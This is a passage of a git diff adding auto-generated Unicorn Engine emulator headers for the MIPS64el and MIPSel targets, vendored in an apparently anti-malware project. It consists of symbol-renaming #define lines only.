helper_mtc0_datalo helper_mtc0_datalo_mips64el +#define helper_mtc0_taghi helper_mtc0_taghi_mips64el +#define helper_mtc0_datahi helper_mtc0_datahi_mips64el +#define helper_mftgpr helper_mftgpr_mips64el +#define helper_mftlo helper_mftlo_mips64el +#define helper_mfthi helper_mfthi_mips64el +#define helper_mftacx helper_mftacx_mips64el +#define helper_mftdsp helper_mftdsp_mips64el +#define helper_mttgpr helper_mttgpr_mips64el +#define helper_mttlo helper_mttlo_mips64el +#define helper_mtthi helper_mtthi_mips64el +#define helper_mttacx helper_mttacx_mips64el +#define helper_mttdsp helper_mttdsp_mips64el +#define helper_dmt helper_dmt_mips64el +#define helper_emt helper_emt_mips64el +#define helper_dvpe helper_dvpe_mips64el +#define helper_evpe helper_evpe_mips64el +#define helper_fork helper_fork_mips64el +#define helper_yield helper_yield_mips64el +#define r4k_helper_tlbinv r4k_helper_tlbinv_mips64el +#define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips64el +#define r4k_helper_tlbwi r4k_helper_tlbwi_mips64el +#define r4k_helper_tlbwr r4k_helper_tlbwr_mips64el +#define r4k_helper_tlbp r4k_helper_tlbp_mips64el +#define r4k_helper_tlbr r4k_helper_tlbr_mips64el +#define helper_tlbwi helper_tlbwi_mips64el +#define helper_tlbwr helper_tlbwr_mips64el +#define helper_tlbp helper_tlbp_mips64el +#define helper_tlbr helper_tlbr_mips64el +#define helper_tlbinv helper_tlbinv_mips64el +#define helper_tlbinvf helper_tlbinvf_mips64el +#define helper_di helper_di_mips64el +#define helper_ei helper_ei_mips64el +#define helper_eret helper_eret_mips64el +#define helper_deret helper_deret_mips64el +#define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips64el +#define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips64el +#define helper_rdhwr_cc helper_rdhwr_cc_mips64el +#define helper_rdhwr_ccres helper_rdhwr_ccres_mips64el +#define helper_pmon helper_pmon_mips64el +#define helper_wait helper_wait_mips64el +#define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips64el +#define mips_cpu_unassigned_access mips_cpu_unassigned_access_mips64el +#define ieee_rm ieee_rm_mips64el +#define helper_cfc1 helper_cfc1_mips64el +#define helper_ctc1 helper_ctc1_mips64el +#define ieee_ex_to_mips ieee_ex_to_mips_mips64el +#define helper_float_sqrt_d helper_float_sqrt_d_mips64el +#define helper_float_sqrt_s helper_float_sqrt_s_mips64el +#define helper_float_cvtd_s helper_float_cvtd_s_mips64el +#define helper_float_cvtd_w helper_float_cvtd_w_mips64el +#define helper_float_cvtd_l helper_float_cvtd_l_mips64el +#define helper_float_cvtl_d helper_float_cvtl_d_mips64el +#define helper_float_cvtl_s helper_float_cvtl_s_mips64el +#define helper_float_cvtps_pw helper_float_cvtps_pw_mips64el +#define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips64el +#define helper_float_cvts_d helper_float_cvts_d_mips64el +#define helper_float_cvts_w helper_float_cvts_w_mips64el +#define helper_float_cvts_l helper_float_cvts_l_mips64el +#define helper_float_cvts_pl helper_float_cvts_pl_mips64el +#define helper_float_cvts_pu helper_float_cvts_pu_mips64el +#define helper_float_cvtw_s helper_float_cvtw_s_mips64el +#define helper_float_cvtw_d helper_float_cvtw_d_mips64el +#define helper_float_roundl_d helper_float_roundl_d_mips64el +#define helper_float_roundl_s helper_float_roundl_s_mips64el +#define helper_float_roundw_d helper_float_roundw_d_mips64el +#define helper_float_roundw_s helper_float_roundw_s_mips64el +#define helper_float_truncl_d helper_float_truncl_d_mips64el +#define helper_float_truncl_s helper_float_truncl_s_mips64el +#define helper_float_truncw_d helper_float_truncw_d_mips64el +#define helper_float_truncw_s helper_float_truncw_s_mips64el +#define helper_float_ceill_d helper_float_ceill_d_mips64el +#define helper_float_ceill_s helper_float_ceill_s_mips64el +#define helper_float_ceilw_d helper_float_ceilw_d_mips64el +#define helper_float_ceilw_s helper_float_ceilw_s_mips64el +#define helper_float_floorl_d helper_float_floorl_d_mips64el +#define helper_float_floorl_s helper_float_floorl_s_mips64el +#define helper_float_floorw_d helper_float_floorw_d_mips64el +#define helper_float_floorw_s helper_float_floorw_s_mips64el +#define helper_float_abs_d helper_float_abs_d_mips64el +#define helper_float_abs_s helper_float_abs_s_mips64el +#define helper_float_abs_ps helper_float_abs_ps_mips64el +#define helper_float_chs_d helper_float_chs_d_mips64el +#define helper_float_chs_s helper_float_chs_s_mips64el +#define helper_float_chs_ps helper_float_chs_ps_mips64el +#define helper_float_maddf_s helper_float_maddf_s_mips64el +#define helper_float_maddf_d helper_float_maddf_d_mips64el +#define helper_float_msubf_s helper_float_msubf_s_mips64el +#define helper_float_msubf_d helper_float_msubf_d_mips64el +#define helper_float_max_s helper_float_max_s_mips64el +#define helper_float_max_d helper_float_max_d_mips64el +#define helper_float_maxa_s helper_float_maxa_s_mips64el +#define helper_float_maxa_d helper_float_maxa_d_mips64el +#define helper_float_min_s helper_float_min_s_mips64el +#define helper_float_min_d helper_float_min_d_mips64el +#define helper_float_mina_s helper_float_mina_s_mips64el +#define helper_float_mina_d helper_float_mina_d_mips64el +#define helper_float_rint_s helper_float_rint_s_mips64el +#define helper_float_rint_d helper_float_rint_d_mips64el +#define helper_float_class_s helper_float_class_s_mips64el +#define helper_float_class_d helper_float_class_d_mips64el +#define helper_float_recip_d helper_float_recip_d_mips64el +#define helper_float_recip_s helper_float_recip_s_mips64el +#define helper_float_rsqrt_d helper_float_rsqrt_d_mips64el +#define helper_float_rsqrt_s helper_float_rsqrt_s_mips64el +#define helper_float_recip1_d helper_float_recip1_d_mips64el +#define helper_float_recip1_s helper_float_recip1_s_mips64el +#define helper_float_recip1_ps helper_float_recip1_ps_mips64el +#define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips64el +#define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips64el +#define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips64el +#define helper_float_add_d helper_float_add_d_mips64el +#define helper_float_add_s helper_float_add_s_mips64el +#define helper_float_add_ps helper_float_add_ps_mips64el +#define helper_float_sub_d helper_float_sub_d_mips64el +#define helper_float_sub_s helper_float_sub_s_mips64el +#define helper_float_sub_ps helper_float_sub_ps_mips64el +#define helper_float_mul_d helper_float_mul_d_mips64el +#define helper_float_mul_s helper_float_mul_s_mips64el +#define helper_float_mul_ps helper_float_mul_ps_mips64el +#define helper_float_div_d helper_float_div_d_mips64el +#define helper_float_div_s helper_float_div_s_mips64el +#define helper_float_div_ps helper_float_div_ps_mips64el +#define helper_float_madd_d helper_float_madd_d_mips64el +#define helper_float_madd_s helper_float_madd_s_mips64el +#define helper_float_madd_ps helper_float_madd_ps_mips64el +#define helper_float_msub_d helper_float_msub_d_mips64el +#define helper_float_msub_s helper_float_msub_s_mips64el +#define helper_float_msub_ps helper_float_msub_ps_mips64el +#define helper_float_nmadd_d helper_float_nmadd_d_mips64el +#define helper_float_nmadd_s helper_float_nmadd_s_mips64el +#define helper_float_nmadd_ps helper_float_nmadd_ps_mips64el +#define helper_float_nmsub_d helper_float_nmsub_d_mips64el +#define helper_float_nmsub_s helper_float_nmsub_s_mips64el +#define helper_float_nmsub_ps helper_float_nmsub_ps_mips64el +#define helper_float_recip2_d helper_float_recip2_d_mips64el +#define helper_float_recip2_s helper_float_recip2_s_mips64el +#define helper_float_recip2_ps helper_float_recip2_ps_mips64el +#define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips64el +#define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips64el +#define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips64el +#define helper_float_addr_ps helper_float_addr_ps_mips64el +#define helper_float_mulr_ps helper_float_mulr_ps_mips64el +#define helper_cmp_d_f helper_cmp_d_f_mips64el +#define helper_cmpabs_d_f helper_cmpabs_d_f_mips64el +#define helper_cmp_d_un helper_cmp_d_un_mips64el +#define helper_cmpabs_d_un helper_cmpabs_d_un_mips64el +#define helper_cmp_d_eq helper_cmp_d_eq_mips64el +#define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips64el +#define helper_cmp_d_ueq helper_cmp_d_ueq_mips64el +#define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips64el +#define helper_cmp_d_olt helper_cmp_d_olt_mips64el +#define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips64el +#define helper_cmp_d_ult helper_cmp_d_ult_mips64el +#define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips64el +#define helper_cmp_d_ole helper_cmp_d_ole_mips64el +#define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips64el +#define helper_cmp_d_ule helper_cmp_d_ule_mips64el +#define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips64el +#define helper_cmp_d_sf helper_cmp_d_sf_mips64el +#define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips64el +#define helper_cmp_d_ngle helper_cmp_d_ngle_mips64el +#define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips64el +#define helper_cmp_d_seq helper_cmp_d_seq_mips64el +#define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips64el +#define helper_cmp_d_ngl helper_cmp_d_ngl_mips64el +#define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips64el +#define helper_cmp_d_lt helper_cmp_d_lt_mips64el +#define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips64el +#define helper_cmp_d_nge helper_cmp_d_nge_mips64el +#define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips64el +#define helper_cmp_d_le helper_cmp_d_le_mips64el +#define helper_cmpabs_d_le helper_cmpabs_d_le_mips64el +#define helper_cmp_d_ngt helper_cmp_d_ngt_mips64el +#define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips64el +#define helper_cmp_s_f helper_cmp_s_f_mips64el +#define helper_cmpabs_s_f helper_cmpabs_s_f_mips64el +#define helper_cmp_s_un helper_cmp_s_un_mips64el +#define helper_cmpabs_s_un helper_cmpabs_s_un_mips64el +#define helper_cmp_s_eq helper_cmp_s_eq_mips64el +#define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips64el +#define helper_cmp_s_ueq helper_cmp_s_ueq_mips64el +#define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips64el +#define helper_cmp_s_olt helper_cmp_s_olt_mips64el +#define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips64el +#define helper_cmp_s_ult helper_cmp_s_ult_mips64el +#define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips64el +#define helper_cmp_s_ole helper_cmp_s_ole_mips64el +#define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips64el +#define helper_cmp_s_ule helper_cmp_s_ule_mips64el +#define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips64el +#define helper_cmp_s_sf helper_cmp_s_sf_mips64el +#define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips64el +#define helper_cmp_s_ngle helper_cmp_s_ngle_mips64el +#define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips64el +#define helper_cmp_s_seq helper_cmp_s_seq_mips64el +#define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips64el +#define helper_cmp_s_ngl helper_cmp_s_ngl_mips64el +#define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips64el +#define helper_cmp_s_lt helper_cmp_s_lt_mips64el +#define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips64el +#define helper_cmp_s_nge helper_cmp_s_nge_mips64el +#define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips64el +#define helper_cmp_s_le helper_cmp_s_le_mips64el +#define helper_cmpabs_s_le helper_cmpabs_s_le_mips64el +#define helper_cmp_s_ngt helper_cmp_s_ngt_mips64el +#define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips64el +#define helper_cmp_ps_f helper_cmp_ps_f_mips64el +#define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips64el +#define helper_cmp_ps_un helper_cmp_ps_un_mips64el +#define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips64el +#define helper_cmp_ps_eq helper_cmp_ps_eq_mips64el +#define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips64el +#define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips64el +#define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips64el +#define helper_cmp_ps_olt helper_cmp_ps_olt_mips64el +#define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips64el +#define helper_cmp_ps_ult helper_cmp_ps_ult_mips64el +#define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips64el +#define helper_cmp_ps_ole helper_cmp_ps_ole_mips64el +#define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips64el +#define helper_cmp_ps_ule helper_cmp_ps_ule_mips64el +#define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips64el +#define helper_cmp_ps_sf helper_cmp_ps_sf_mips64el +#define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips64el +#define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips64el +#define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips64el +#define helper_cmp_ps_seq helper_cmp_ps_seq_mips64el +#define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips64el +#define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips64el +#define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips64el +#define helper_cmp_ps_lt helper_cmp_ps_lt_mips64el +#define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips64el +#define helper_cmp_ps_nge helper_cmp_ps_nge_mips64el +#define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips64el +#define helper_cmp_ps_le helper_cmp_ps_le_mips64el +#define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips64el +#define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips64el +#define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips64el +#define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips64el +#define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips64el +#define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips64el +#define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips64el +#define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips64el +#define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips64el +#define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips64el +#define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips64el +#define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips64el +#define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips64el +#define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips64el +#define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips64el +#define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips64el +#define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips64el +#define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips64el +#define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips64el +#define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips64el +#define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips64el +#define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips64el +#define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips64el +#define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips64el +#define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips64el +#define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips64el +#define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips64el +#define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips64el +#define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips64el +#define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips64el +#define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips64el +#define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips64el +#define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips64el +#define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips64el +#define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips64el +#define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips64el +#define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips64el +#define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips64el +#define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips64el +#define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips64el +#define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips64el +#define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips64el +#define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips64el +#define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips64el +#define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips64el +#define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips64el +#define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips64el +#define helper_msa_ld_df helper_msa_ld_df_mips64el +#define helper_msa_st_df helper_msa_st_df_mips64el +#define no_mmu_map_address no_mmu_map_address_mips64el +#define fixed_mmu_map_address fixed_mmu_map_address_mips64el +#define r4k_map_address r4k_map_address_mips64el +#define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips64el +#define mips_cpu_handle_mmu_fault mips_cpu_handle_mmu_fault_mips64el +#define cpu_mips_translate_address cpu_mips_translate_address_mips64el +#define exception_resume_pc exception_resume_pc_mips64el +#define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips64el +#define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips64el +#define r4k_invalidate_tlb r4k_invalidate_tlb_mips64el +#define helper_absq_s_ob helper_absq_s_ob_mips64el +#define helper_absq_s_qh helper_absq_s_qh_mips64el +#define helper_absq_s_pw helper_absq_s_pw_mips64el +#define helper_adduh_ob helper_adduh_ob_mips64el +#define helper_adduh_r_ob helper_adduh_r_ob_mips64el +#define helper_subuh_ob helper_subuh_ob_mips64el +#define helper_subuh_r_ob helper_subuh_r_ob_mips64el +#define helper_addq_pw helper_addq_pw_mips64el +#define helper_addq_qh helper_addq_qh_mips64el +#define helper_addq_s_pw helper_addq_s_pw_mips64el +#define helper_addq_s_qh helper_addq_s_qh_mips64el +#define helper_addu_ob helper_addu_ob_mips64el +#define helper_addu_qh helper_addu_qh_mips64el +#define helper_addu_s_ob helper_addu_s_ob_mips64el +#define helper_addu_s_qh helper_addu_s_qh_mips64el +#define helper_subq_pw helper_subq_pw_mips64el +#define helper_subq_qh helper_subq_qh_mips64el +#define helper_subq_s_pw helper_subq_s_pw_mips64el +#define helper_subq_s_qh helper_subq_s_qh_mips64el +#define helper_subu_ob helper_subu_ob_mips64el +#define helper_subu_qh helper_subu_qh_mips64el +#define helper_subu_s_ob helper_subu_s_ob_mips64el +#define helper_subu_s_qh helper_subu_s_qh_mips64el +#define helper_raddu_l_ob helper_raddu_l_ob_mips64el +#define helper_precr_ob_qh helper_precr_ob_qh_mips64el +#define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips64el +#define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips64el +#define helper_precrq_ob_qh helper_precrq_ob_qh_mips64el +#define helper_precrq_qh_pw helper_precrq_qh_pw_mips64el +#define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips64el +#define helper_precrq_pw_l helper_precrq_pw_l_mips64el +#define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips64el +#define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips64el +#define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips64el +#define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips64el +#define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips64el +#define helper_precequ_qh_obl helper_precequ_qh_obl_mips64el +#define helper_precequ_qh_obr helper_precequ_qh_obr_mips64el +#define helper_precequ_qh_obla helper_precequ_qh_obla_mips64el +#define helper_precequ_qh_obra helper_precequ_qh_obra_mips64el +#define helper_preceu_qh_obl helper_preceu_qh_obl_mips64el +#define helper_preceu_qh_obr helper_preceu_qh_obr_mips64el +#define helper_preceu_qh_obla helper_preceu_qh_obla_mips64el +#define helper_preceu_qh_obra helper_preceu_qh_obra_mips64el +#define helper_shll_ob helper_shll_ob_mips64el +#define helper_shrl_ob helper_shrl_ob_mips64el +#define helper_shra_ob helper_shra_ob_mips64el +#define helper_shra_r_ob helper_shra_r_ob_mips64el +#define helper_shll_qh helper_shll_qh_mips64el +#define helper_shll_s_qh helper_shll_s_qh_mips64el +#define helper_shrl_qh helper_shrl_qh_mips64el +#define helper_shra_qh helper_shra_qh_mips64el +#define helper_shra_r_qh helper_shra_r_qh_mips64el +#define helper_shll_pw helper_shll_pw_mips64el +#define helper_shll_s_pw helper_shll_s_pw_mips64el +#define helper_shra_pw helper_shra_pw_mips64el +#define helper_shra_r_pw helper_shra_r_pw_mips64el +#define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips64el +#define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips64el +#define helper_mulq_rs_qh helper_mulq_rs_qh_mips64el +#define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips64el +#define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips64el +#define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips64el +#define helper_dpau_h_obl helper_dpau_h_obl_mips64el +#define helper_dpau_h_obr helper_dpau_h_obr_mips64el +#define helper_dpsu_h_obl helper_dpsu_h_obl_mips64el +#define helper_dpsu_h_obr helper_dpsu_h_obr_mips64el +#define helper_dpa_w_qh helper_dpa_w_qh_mips64el +#define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips64el +#define helper_dps_w_qh helper_dps_w_qh_mips64el +#define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips64el +#define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips64el +#define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips64el +#define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips64el +#define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips64el +#define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips64el +#define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips64el +#define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips64el +#define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips64el +#define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips64el +#define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips64el +#define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips64el +#define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips64el +#define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips64el +#define helper_dmadd helper_dmadd_mips64el +#define helper_dmaddu helper_dmaddu_mips64el +#define helper_dmsub helper_dmsub_mips64el +#define helper_dmsubu helper_dmsubu_mips64el +#define helper_dinsv helper_dinsv_mips64el +#define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips64el +#define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips64el +#define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips64el +#define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips64el +#define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips64el +#define helper_cmpu_le_ob helper_cmpu_le_ob_mips64el +#define helper_cmp_eq_qh helper_cmp_eq_qh_mips64el +#define helper_cmp_lt_qh helper_cmp_lt_qh_mips64el +#define helper_cmp_le_qh helper_cmp_le_qh_mips64el +#define helper_cmp_eq_pw helper_cmp_eq_pw_mips64el +#define helper_cmp_lt_pw helper_cmp_lt_pw_mips64el +#define helper_cmp_le_pw helper_cmp_le_pw_mips64el +#define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips64el +#define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips64el +#define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips64el +#define helper_pick_ob helper_pick_ob_mips64el +#define helper_pick_qh helper_pick_qh_mips64el +#define helper_pick_pw helper_pick_pw_mips64el +#define helper_packrl_pw helper_packrl_pw_mips64el +#define helper_dextr_w helper_dextr_w_mips64el +#define helper_dextr_r_w helper_dextr_r_w_mips64el +#define helper_dextr_rs_w helper_dextr_rs_w_mips64el +#define helper_dextr_l helper_dextr_l_mips64el +#define helper_dextr_r_l helper_dextr_r_l_mips64el +#define helper_dextr_rs_l helper_dextr_rs_l_mips64el +#define helper_dextr_s_h helper_dextr_s_h_mips64el +#define helper_dextp helper_dextp_mips64el +#define helper_dextpdp helper_dextpdp_mips64el +#define helper_dshilo helper_dshilo_mips64el +#define helper_dmthlip helper_dmthlip_mips64el +#define helper_dclo helper_dclo_mips64el +#define helper_dclz helper_dclz_mips64el +#define helper_dbitswap helper_dbitswap_mips64el +#define helper_lld helper_lld_mips64el +#define helper_scd helper_scd_mips64el +#define helper_sdl helper_sdl_mips64el +#define helper_sdr helper_sdr_mips64el +#define helper_ldm helper_ldm_mips64el +#define helper_sdm helper_sdm_mips64el +#define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips64el +#define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips64el +#define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips64el +#define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips64el +#define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips64el +#define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips64el +#define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips64el +#define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips64el +#define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips64el +#define mips_reg_reset mips_reg_reset_mips64el +#define mips_reg_read mips_reg_read_mips64el +#define mips_reg_write mips_reg_write_mips64el +#define mips_tcg_init mips_tcg_init_mips64el +#define mips_cpu_list mips_cpu_list_mips64el +#define mips_release mips_release_mips64el +#define MIPS64_REGS_STORAGE_SIZE MIPS64_REGS_STORAGE_SIZE_mips64el +#define MIPS_REGS_STORAGE_SIZE MIPS_REGS_STORAGE_SIZE_mips64el +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/mipsel.h b/ai_anti_malware/unicorn/unicorn-master/qemu/mipsel.h new file mode 100644 index 0000000..a04123e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/mipsel.h @@ -0,0 +1,3928 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_MIPSEL_H +#define UNICORN_AUTOGEN_MIPSEL_H +#define arm_release arm_release_mipsel +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_mipsel +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_mipsel +#define use_idiv_instructions_rt use_idiv_instructions_rt_mipsel +#define tcg_target_deposit_valid tcg_target_deposit_valid_mipsel +#define helper_power_down helper_power_down_mipsel +#define check_exit_request check_exit_request_mipsel +#define address_space_unregister address_space_unregister_mipsel +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mipsel +#define phys_mem_clean phys_mem_clean_mipsel +#define tb_cleanup tb_cleanup_mipsel +#define memory_map memory_map_mipsel +#define memory_map_ptr memory_map_ptr_mipsel +#define memory_unmap memory_unmap_mipsel +#define memory_free memory_free_mipsel +#define free_code_gen_buffer free_code_gen_buffer_mipsel +#define helper_raise_exception helper_raise_exception_mipsel +#define tcg_enabled tcg_enabled_mipsel +#define tcg_exec_init tcg_exec_init_mipsel +#define memory_register_types memory_register_types_mipsel +#define cpu_exec_init_all cpu_exec_init_all_mipsel +#define vm_start vm_start_mipsel +#define resume_all_vcpus resume_all_vcpus_mipsel +#define a15_l2ctlr_read a15_l2ctlr_read_mipsel +#define a64_translate_init a64_translate_init_mipsel +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_mipsel +#define aa64_cacheop_access aa64_cacheop_access_mipsel +#define aa64_daif_access aa64_daif_access_mipsel +#define aa64_daif_write aa64_daif_write_mipsel +#define aa64_dczid_read aa64_dczid_read_mipsel +#define aa64_fpcr_read aa64_fpcr_read_mipsel +#define aa64_fpcr_write aa64_fpcr_write_mipsel +#define aa64_fpsr_read aa64_fpsr_read_mipsel +#define aa64_fpsr_write aa64_fpsr_write_mipsel +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_mipsel +#define aa64_zva_access aa64_zva_access_mipsel +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_mipsel +#define aarch64_restore_sp aarch64_restore_sp_mipsel +#define aarch64_save_sp aarch64_save_sp_mipsel +#define accel_find accel_find_mipsel +#define accel_init_machine accel_init_machine_mipsel +#define accel_type accel_type_mipsel +#define access_with_adjusted_size access_with_adjusted_size_mipsel +#define add128 add128_mipsel +#define add16_sat add16_sat_mipsel +#define add16_usat add16_usat_mipsel +#define add192 add192_mipsel +#define add8_sat add8_sat_mipsel +#define add8_usat add8_usat_mipsel +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_mipsel +#define add_cpreg_to_list add_cpreg_to_list_mipsel +#define addFloat128Sigs addFloat128Sigs_mipsel +#define addFloat32Sigs addFloat32Sigs_mipsel +#define addFloat64Sigs addFloat64Sigs_mipsel +#define addFloatx80Sigs addFloatx80Sigs_mipsel +#define add_qemu_ldst_label add_qemu_ldst_label_mipsel +#define address_space_access_valid address_space_access_valid_mipsel +#define address_space_destroy address_space_destroy_mipsel +#define address_space_destroy_dispatch address_space_destroy_dispatch_mipsel +#define 